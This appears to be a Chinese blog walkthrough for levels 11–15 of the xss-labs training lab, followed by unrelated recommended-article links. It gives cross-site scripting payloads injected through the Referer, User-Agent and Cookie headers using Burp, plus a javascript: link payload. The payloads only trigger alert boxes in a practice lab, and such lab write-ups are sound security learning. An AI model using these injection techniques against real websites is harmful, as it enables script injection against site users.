xss-labs通关攻略 11-15关

第十一关:less-11

步骤一:利用burp抓包

步骤二:添加referer:click me!" type="button" οnmοuseοver="alert(/xss/)进行放包

第十二关:less-12

步骤一:利用burp抓包

步骤二:修改User Agent:click me!" type="button" οnmοuseοver="alert(/xss/)进行放包

第十三关:less-13

步骤一:利用burp抓包

步骤二:修改Cookie: user=click me!" type="button" οnmοuseοver="alert(/xss/)

第十四关:less-14

这题有关exif xss

第十五关:less-15

输入:src='level1.php?name=<a href="javascript:alert(1)">'

相关推荐
秃了也弱了。14 分钟前
Chrome谷歌浏览器插件ModHeader,修改请求头,开发神器
前端·chrome
乆夨(jiuze)34 分钟前
记录H5内嵌到flutter App的一个问题,引发后面使用fastClick,引发后面input输入框单击无效问题。。。
前端·javascript·vue.js
忧郁的蛋~1 小时前
HTML表格导出为Excel文件的实现方案
前端·html·excel
小彭努力中1 小时前
141.在 Vue 3 中使用 OpenLayers Link 交互:把地图中心点 / 缩放级别 / 旋转角度实时写进 URL,并同步解析显示
前端·javascript·vue.js·交互
然我1 小时前
别再只用 base64!HTML5 的 Blob 才是二进制处理的王者,面试常考
前端·面试·html
NanLing1 小时前
【纯前端推理】纯端侧 AI 对象检测:用浏览器就能跑的深度学习模型
前端
呆呆的心1 小时前
前端必学:从盒模型到定位,一篇搞定页面布局核心 🧩
前端·css
小飞悟1 小时前
前端高手才知道的秘密:Blob 居然这么强大!
前端·javascript·html
小old弟1 小时前
用Sass循环实现炫彩文字跑马灯效果
前端
code_YuJun1 小时前
Promise 基础使用
前端·javascript·promise